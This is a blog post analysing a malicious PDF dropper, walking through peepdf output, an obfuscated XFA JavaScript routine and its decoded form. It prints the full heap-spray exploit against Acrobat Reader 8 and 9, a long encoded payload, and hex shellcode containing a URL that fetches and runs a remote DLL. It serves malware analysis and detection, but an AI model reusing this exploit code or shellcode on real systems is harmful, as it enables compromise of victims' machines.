PDF dropper analysis

31/10/2017 in malware | tags : pdf, js, malware, dropper by ghozt

Intro

While looking for some malware sample, I land on this website.

The "whatami.zip" file inspired me, once downloaded and unziped, SURPRISE !

ghozt@glider: ~/whatami/file>$ file whatami 
whatami: PDF document, version 1.6

I wanted to reverse some PE or linux ELF, not this time...

PDF inspection

Let's use peepdf tools so see what kind of malicious stuff is inside.

ghozt@glider: ~/whatami/file>$ python2 ~/tools/peepdf/peepdf.py -fi whatami
File: whatami
MD5: 97ccac199b8893380e14b0583596abb6
SHA1: 5d6244a12982fa121b571affae6141d5db4437ee
SHA256: 3dee507f593266f9b4bbe9d50eddd906bee4295a4b64d7b6e8039286b321e700
Size: 14781 bytes
Version: 1.6
Binary: True
Linearized: False
Encrypted: False
Updates: 0
Objects: 27
Streams: 12
URIs: 0
Comments: 0
Errors: 9

Version 0:
    Catalog: 1
    Info: No
    Objects (27): [1, 2, 3, 6, 8, 13, 14, 15, 18, 19, 20, 21, 22, 27, 28, 29, 30, 31, 32, 41, 42, 43, 44, 45, 46, 48, 52]
    Streams (12): [52, 13, 18, 19, 32, 41, 42, 43, 44, 45, 46, 48]
        Encoded (10): [13, 18, 19, 32, 41, 42, 43, 44, 46, 48]
    Objects with JS code (1): [43]
    Suspicious elements:
        /AcroForm (1): [1]
        /Names (1): [1]
        /XFA (1): [1]
        /EmbeddedFile: [41, 42, 43, 44, 45, 46]

Hum, an XFA form, some embedded files, and ... "Objects with JS code (1): [43]" ...

PPDF> stream 43

<!--#@^#@^#T@V%@NY%VU#@NTYW#&T--><template><subform layout="tb" locale="ru_RU" name="form1"><pageSet><pageArea id="Page1" name="Page1"><contentArea h="10.5in" w="8in" x="0.25in" y="0.25in"></contentArea><medium long="11in" short="8.5in" stock="letter"></medium></pageArea></pageSet><subform h="10.5in" w="8in"><field h="98.425mm" name="ImageField1" w="28.575mm" x="95.25mm" y="19.05mm"><ui><imageEdit></imageEdit></ui><caption placement="bottom" reserve="5mm"><font typeface="Myriad Pro"></font><para vAlign="middle"></para><value><text>Image Field</text></value></caption><border xmlns="http://www.xfa.org/schema/xfa-template/2.2/"><edge presence="hidden"></edge><edge stroke="dotted"></edge><edge stroke="dotted"></edge><edge stroke="dashed"></edge><corner stroke="dotted"></corner><corner stroke="dotted"></corner><corner stroke="dashed"></corner><fill><pattern type="crossDiagonal"></pattern></fill></border><event xmlns:xfa="http://www.xfa.org/schema/xfa-template/2.2/" activity="initialize">
<xfa:script contentType='&#000000097;pplication/x-javascript'>
/*




*/
with(event){
l="l";
ev=/*ewbwf*/"eva"/*/renyaerz*/;
t=target;
aa=/*/gbergern*/'co'+'de]';
ind="indexOf";
if(app.setProfile)if((app.setProfile+/**/"asvfa")[ind](aa)!=-1){k=t[/*czx*/ev/*qwdsa*/+l/*sgewgerj*/];}
a=/**/t.creationDate.split('|')[0].substr(13);
}
s="";
p=k("pars"+"eInt");
z=a;
e="de";
ll="length";
ss=/*bgre*/k("String");
ff="from";
ff+="Ch";
ff+="arCo";
ss=ss[ff/*x*/+e];
xz=a.length;
for(i=0;i&lt;xz;i+=2){
    if (z[i]=='-')continue;
    s=s+(ss(p(z[i]+z[i+1],0x1a)));
}
zx=k;
zx(s);
</xfa:script></event></field></subform><proto></proto></subform><?templateDesigner DefaultLanguage FormCalc?><?templateDesigner DefaultRunAt client?><?templateDesigner Grid show:1, snap:1, units:0, color:ff8080, origin:(0,0), interval:(125000,125000)?><?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?><?templateDesigner Zoom 76?></template>

If one day, someone ask you for a definition of a shitty failed obfuscation, please send him this !

Basically the script get "creationDate" object, deobfuscate it, then eval() the result.

Let's dump the "creationDate" object and let the script deobfuscate it for us.

PPDF> search creationdate

[3, 43]

PPDF> object 3

<< /Title asdasdsad
/CreationDate %#^&*%^#@&%#@3J-348481K3J-7443N4A4C-1293N4E3N-0464C1K4C-83J4A3P3N-44C1K3L4A-63N3J4C41-147462G3J-14C3N1K4B-34844414C-81E1D4K1D-41F3D1N3F-51K4A3N48-8443J3L3N-81E1L271L-63P1I1D1D-61F274E3J-74A16483J-83M3M4146-53P274E3J-74A163K3K-03K1I163L-03L3L1I16-43M3M3M1I-7163N3N3N-31I163O3O-73O1I163P-13P3P1I16-740404027-94E3J4A16-248474146-04C3N4A4B-83H3J1I16-541274E3J-34A164G16-72916463N-04F162D4A-14A3J4H1E-01F274E3J-14A164H16-42916463N-04F162D4A-74A3J4H1E-11F274E3J-04A163H44-61N291820-73L1O1M22-61M1M3O1M-5211N2324-71M203J1P-33L1O1M22-31M1M3O1M-83O221P24-31M203J3J-71P3N3K24-71M203J1P-91M1O1M24-41O203J22-83N1O3O24-61M203J20-61N201N20-21N201N1O-8221M1M1M-41M1M1M1M-81M1M1M1M-31M1M1M1M-11M1M1M1M-01M1M1M1M-41M1M1M1M-11M1M1M1N-31O1P2524-01M203J22-1201O1M22-31M1M3O1M-41M1M201M-31M1M1M20-91N201N20-31N201N20-01N201N20-61N201N18-11H3N4E3N-3464C1K4C-93J4A3P3N-94C1K3L4A-93N3J4C41-947462G3J-84C3N1K4B-04844414C-51E1D4K1D-71F3D1N3F-81K4A3N48-1443J3L3N-11E1L271L-63P1I1D1D-81F274E3J-14A163H44-01O291820-93L1O1M22-11M1M3O3J-621221P24-31M203J1P-73L1O1M22-71M1M3O25-6221O1N24-01M203J25-31M1N3O24-01M203J1P-11M251M24-620203J23-23M233N24-71M203J20-71N201N20-71N201N1O-9221M1M1M-81M1M1M1M-61M1M1M1M-81M1M1M1M-71M1M1M1M-61M1M1M1M-51M1M1M1M-61M1M1M23-41N242424-71M203J22-7201O1M22-31M1M3O1M-51M1M201M-11M1M1M20-51N201N20-61N201N20-41N201N20-11N201N18-91H3N4E3N-1464C1K4C-03J4A3P3N-84C1K3L4A-13N3J4C41-347462G3J-04C3N1K4B-24844414C-21E1D4K1D-21F3D1N3F-01K4A3N48-9443J3L3N-91E1L271L-13P1I1D1D-01F273H44-81P293J48-948273H44-72029463N-64F162D4A-44A3J4H1E-31F273O4D-3463L4C41-34746163H-244211E1F-64J4E3J4A-0163H4422-5293H441P-11K4E413N-74F3N4A38-03N4A4B41-447461K4C-847354C4A-141463P1E-71F273H44-822293H44-5221K4A3N-048443J3L-83N1E1D1K-71D1I1D1D-21F274F40-241443N1E-93H44221K-4443N463P-24C402820-01F3H4422-41H291D1M-21D274A3N-14C4D4A46-316483J4A-84B3N2L46-84C1E3H44-8221I1N1M-31F4L3O4D-3463L4C41-04746163H-944231E3H-444241I3H-844251F4J-24F404144-33N1E3H44-8241K443N-9463P4C40-31G1O283H-144251F3H-644241H29-23H442427-64A3N4C4D-84A46163H-244241K4B-64D3K4B4C-34A41463P-51E1M1I3H-744251L1O-71F4L3O4D-9463L4C41-04746163H-32L1M1E3H-12L1N1F4J-13H2L1N29-64D463N4B-13L3J483N-11E3H2L1N-41F274A47-54C3N2G3J-543293H2L-61N1K443N-6463P4C40-11G1O273M-43J433447-14C3N294D-4463N4B3L-43J483N1E-01D1B4D25-91M251M1D-61F274B48-84A3J4H29-13H44231E-43M3J4334-6474C3N1I-41M4G1O1M-01M1M1J4A-9474C3N2G-13J431F27-044474G39-8403N3N29-03H2L1N1H-04B484A3J-14H274447-34G39403N-33N293H44-7231E4447-64G39403N-73N1I211O-3201M2524-31F273O47-24A1E4129-01M271641-016281620-51M1M2716-4411H1H1F-33H44203D-1413F2944-1474G3940-33N3N1K4B-04D3K4B4C-74A1E1M1I-144474G39-4403N3N1K-1443N463P-94C401J1N-01F1H3M3J-44334474C-93N274L3O-14D463L4C-641474616-73H2L1O1E-33H2L1N1I-6443N461F-14J4F4041-6443N1E3H-12L1N1K44-03N463P4C-44028443N-8461F3H2L-41N1H293H-82L1N274A-23N4C4D4A-646163H2L-01N1K4B4D-93K4B4C4A-241463P1E-31M1I443N-0461F4L3O-34D463L4C-841474616-13H2L1P1E-03H2L1N1F-14J4A3N4C-7291D1D27-43O474A1E-041291M27-741283H2L-01N1K443N-1463P4C40-027411H29-61O1F4J3K-1293H2L1N-31K4B4D3K-44B4C4A1E-2411I1O1F-1273L2948-73J4A4B3N-42L464C1E-53K1I1N22-81F274A3N-04C1H2935-54C4A4146-03P1K3O4A-647452F40-73J4A2F47-03M3N1E3L-91F274L4A-23N4C4D4A-246164A3N-24C4L3O4D-0463L4C41-54746163H-542411N1E-33H2L1N1I-23H2L201F-14J3H2L21-4291D1D27-93O474A1E-33H2L2229-71M273H2L-922283H2L-91N1K443N-8463P4C40-4273H2L22-51H1H1F4J-23H442529-53H2L201K-2443N463P-74C40273H-32L23293H-02L1N1K3L-7403J4A2F-8473M3N2D-34C1E3H2L-6221F273H-82L24293H-52L201K3L-5403J4A2F-0473M3N2D-94C1E3H2L-9221B3H44-1251F273H-52L211H29-6354C4A41-6463P1K3O-94A47452F-7403J4A2F-2473M3N1E-13H2L233G-03H2L241F-0274L4A3N-24C4D4A46-1163H2L21-84L3O4D46-73L4C4147-846163H2L-3251E3H2L-4221F4J3H-3421M293H-22L221K4C-747354C4A-541463P1E-91N221F27-83H421N29-03H421M1K-5443N463P-64C40273H-52L21291E-23H421N1B-61O1F2B1D-71M1D1H3H-2421M263H-9421M274A-23N4C4D4A-046163H2L-8214L3O4D-3463L4C41-04746163H-0421O1E3H-42L1N1F4J-03H2L2129-01D1D273O-7474A1E3H-42L22291M-1273H2L22-4283H2L1N-41K443N46-63P4C4027-03H2L221H-7291O1F4J-83H2L211H-8291D1B4D-31D273H2L-7211H293H-82L251E3H-32L1N1K3L-5403J4A2F-6473M3N2D-14C1E3H2L-9221H1N1F-41F273H2L-8211H293H-32L251E3H-62L1N1K3L-2403J4A2F-4473M3N2D-44C1E3H2L-5221F1F4L-44A3N4C4D-44A46163H-02L214L3O-64D463L4C-741474616-93H421P1E-21F4J3H42-020293H44-5211E1F27-7413O1E3H-642202825-51M1M1M1F-44J3H4221-4291D471H-54D2D3542-93P3P3P43-3484D2O20-32E2N1L1L-51L1L1L4F-82D2D2D2D-12E2D2D2D-62D2D2D2D-82D2D2D2D-62D332D2D-62D2D2D2D-12D2D3O40-23J2D3541-82D3P3B2D-725242H2L-82E2N1D27-53H422229-13H441N27-43H422329-53H2L1P1E-03H42221F-34L3N444B-63N4J3H42-221291D43-32E1H2D35-142413340-92H48253O-1472E2N1L-71L1L1L1L-64F2D2D2D-52D2E2D2D-22D2D2D2D-52D2D2D2D-92D2D332D-82D2D2D2D-02D2D2D3B-94G2F2D35-9412D3P3B-82D1L3O2H-9202E2N1D-7273H4222-4293H441O-3273H4223-1293H2L1P-41E3H4222-01F4L3H42-924291D35-03743492D-42G3P3P2D-62D2E2E1D-7273H4225-4293H2L1O-91E1D3337-42I2E1D1I-61N1M2524-5201F273H-544441M29-61D33333L-62D2D2D2H-42G2D2D2H-22D2D2D2D-24F2L2D2D-92D2D332H-92G2D2D2H-32D2D2D2D-72E2D2D2D-02D2D4F2H-42G2D2D2H-82D2D2D2D-02E2D2D2D-42D2E3P2H-62G2D2D2H-72D2D2D2D-92E2D2D2D-72D2H332H-12H2D2D2H-92D2D2D2D-92L2D2D2D-32D2I4F2H-52H2D2D2H-52D2D2D2D-34F2L2D2D-92D372D2H-62G2D2P4F-72D2D2D2F-6352L2D2D-12D2D2D2D-42D2D2D2D-42P2G2D42-81L1L1L1L-11L1D273H-844441N29-23H42241H-03H42251H-73H44441M-71H3H4221-7273H4444-91O293H42-1411N1E3H-542231I1D-21D1F2741-73O1E3H44-3441O1K44-93N463P4C-6401B1O1F-33H44441O-01H294D46-83N4B3L3J-2483N1E1D-61B1M1M1D-51F273H44-9441P293H-9421O1E3H-544441O1F-5274F414C-8401E4J43-3263H4444-71P4L1F3H-22L1M1E43-91F272L45-73J3P3N2I-3413N443M-71N1K4A3J-94F383J44-34D3N293H-644441N4L-63H421P1E-21F27|6683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f62682e686974686f6d656c6f616e732e636f6d2f6368616e6e656c2f76696577735f6761746865722e7068703f616372633d316c3a31683a316e3a33323a3330266b7965766f7875683d31683a32773a316e3a316c3a32763a33313a31683a33323a316d3a3169266b706471747163763d3169267963666c686a74703d67726a7377646c267576656f3d71786a766f636c0000 >>

What a creation date ! Marty Fly will fear seeing it ... anyway.

str = "%#^&*%^#@&%#@3J-348 ......"
str = str.split('|')[0].substr(13)
final = ""
size = str.length
for(i=0;i < size; i+=2){
    if(str[i] == '-')
        continue;
    final = final + String.fromCharCode(parseInt(str[i]+str[i+1],0x1a))
}
console.log(final)
ghozt@glider: ~/whatami/first_routine>$ node stream.js
app.alert=event.target.creationDate.split('|')[1].replace(/;/g,'');var padding;var bbb, ccc, ddd, eee, fff, ggg, hhh;var pointers_a, i;var x = new Array();var y = new Array();var _l1="4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141"+event.target.creationDate.split('|')[1].replace(/;/g,'');var _l2="4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f000400004141414141414141"+event.target.creationDate.split('|')[1].replace(/;/g,'');_l3=app;_l4=new Array();function _l5(){var _l6=_l3.viewerVersion.toString();_l6=_l6.replace('.','');while(_l6.length<4)_l6+='0';return parseInt(_l6,10)}function _l7(_l8,_l9){while(_l8.length*2<_l9)_l8+=_l8;return _l8.substring(0,_l9/2)}function _I0(_I1){_I1=unescape(_I1);roteDak=_I1.length*2;dakRote=unescape('%u9090');spray=_l7(dakRote,0x2000-roteDak);loxWhee=_I1+spray;loxWhee=_l7(loxWhee,524098);for(i=0; i < 400; i++)_l4[i]=loxWhee.substr(0,loxWhee.length-1)+dakRote;}function _I2(_I1,len){while(_I1.length<len)_I1+=_I1;return _I1.substring(0,len)}function _I3(_I1){ret='';for(i=0;i<_I1.length;i+=2){b=_I1.substr(i,2);c=parseInt(b,16);ret+=String.fromCharCode(c);}return ret}function _ji1(_I1,_I4){_I5='';for(_I6=0;_I6<_I1.length;_I6++){_l9=_I4.length;_I7=_I1.charCodeAt(_I6);_I8=_I4.charCodeAt(_I6%_l9);_I5+=String.fromCharCode(_I7^_I8);}return _I5}function _I9(_I6){_j0=_I6.toString(16);_j1=_j0.length;_I5=(_j1%2)?'0'+_j0:_j0;return _I5}function _j2(_I1){_I5='';for(_I6=0;_I6<_I1.length;_I6+=2){_I5+='%u';_I5+=_I9(_I1.charCodeAt(_I6+1));_I5+=_I9(_I1.charCodeAt(_I6))}return _I5}function _j3(){_j4=_l5();if(_j4<9000){_j5='o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';_j6=_l1;_j7=_I3(_j6)}else{_j5='kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';_j6=_l2;_j7=_I3(_j6)}_j8='SUkqADggAABB';_j9=_I2('QUFB',10984);_ll0='QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';_ll1=_j8+_j9+_ll0+_j5;_ll2=_ji1(_j7,'');if(_ll2.length%2)_ll2+=unescape('%00');_ll3=_j2(_ll2);with({k:_ll3})_I0(k);ImageField1.rawValue=_ll1}_j3();

Alt Text

Here is the script "deobfuscated" :

app.alert=event.target.creationDate.split('|')[1].replace(/;/g,'');
var padding;
var bbb, ccc, ddd, eee, fff, ggg, hhh;
var pointers_a, i;
var x = new Array();
var y = new Array();
var sc_v8="4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141"+event.target.creationDate.split('|')[1].replace(/;/g,'');
var sc_v9="4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f000400004141414141414141"+event.target.creationDate.split('|')[1].replace(/;/g,'');
var_app=app;
pwnheap=new Array();

function get_version(){
    var _l6=var_app.viewerVersion.toString();
    _l6=_l6.replace('.','');
    while(_l6.length<4)
        _l6+='0';
    return parseInt(_l6,10)
}

function _l7(_l8,_l9){
    while(_l8.length*2<_l9)
        _l8+=_l8;
    return _l8.substring(0,_l9/2)
}

function spray_heap(_I1){
    _I1=unescape(_I1);
    roteDak=_I1.length*2;
    dakRote=unescape('%u9090');
    spray=_l7(dakRote,0x2000-roteDak);
    loxWhee=_I1+spray;
    loxWhee=_l7(loxWhee,524098);
    for(i=0; i < 400; i++)
        pwnheap[i]=loxWhee.substr(0,loxWhee.length-1)+dakRote;
}

function _I2(_I1,len){
    while(_I1.length<len)
        _I1+=_I1;
    return _I1.substring(0,len)
}

function _I3(_I1){
    ret='';
    for(i=0;i<_I1.length;i+=2){
        b=_I1.substr(i,2);
        c=parseInt(b,16);
        ret+=String.fromCharCode(c);
    }
    return ret
}

function _ji1(_I1,_I4){
    _I5='';
    for(_I6=0;_I6<_I1.length;_I6++){
        _l9=_I4.length;
        _I7=_I1.charCodeAt(_I6);
        _I8=_I4.charCodeAt(_I6%_l9);
        _I5+=String.fromCharCode(_I7^_I8);
    }
    return _I5
}

function _I9(_I6){
    _j0=_I6.toString(16);
    _j1=_j0.length;
    _I5=(_j1%2) ? '0'+_j0 : _j0;
    return _I5
}

function _j2(_I1){
    _I5='';
    for(_I6=0;_I6<_I1.length;_I6+=2){
        _I5+='%u';
        _I5+=_I9(_I1.charCodeAt(_I6+1));
        _I5+=_I9(_I1.charCodeAt(_I6))
    }
    return _I5
}

function compute_shellcode(){
    version=get_version();
    if(version<9000){
        _j5='o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
        shellcode=sc_v8;
        _j7=_I3(shellcode)
    }
    else{
        _j5='kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
        shellcode=sc_v9;
        _j7=_I3(shellcode)
    }
    _j8='SUkqADggAABB';
    _j9=_I2('QUFB',10984);
    _ll0='QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
    _ll1=_j8+_j9+_ll0+_j5;
    _ll2=_ji1(_j7,'');
    if(_ll2.length%2)
        _ll2+=unescape('%00');
    _ll3=_j2(_ll2);
    with({k:_ll3})
        spray_heap(k);
    ImageField1.rawValue=_ll1
}

compute_shellcode();

This time, it works with the second part of the creationDate object. Looks like an heap spraying js on acrobat reader (compatible version 8 and 9, what a conscientious guy...)

Spray and shellcode are generated then loaded in a .tiff image. Maybe a vulnerability on the tiff lib or whatever in Acrobat Reader..

I did not reverse the shellcode but according to the strings output, it downlad a malicious dll from a remote server,wpbt.dll, then execute it.

After some internet research, this dropper was introduced in 2010/2011 and the domain is not active anymore :(

I will register a trash email addresse to receive some recent malware samples :)

Conclusion

Some words about the """obfuscation""", here , it is just a way to bypass some AV more than hide the code. How to spot a malicious pdf :

  • errors in xref
  • XFA form in the pdf

Tools

Keep calm, grab a beer, and try harder

ghozt

Comments !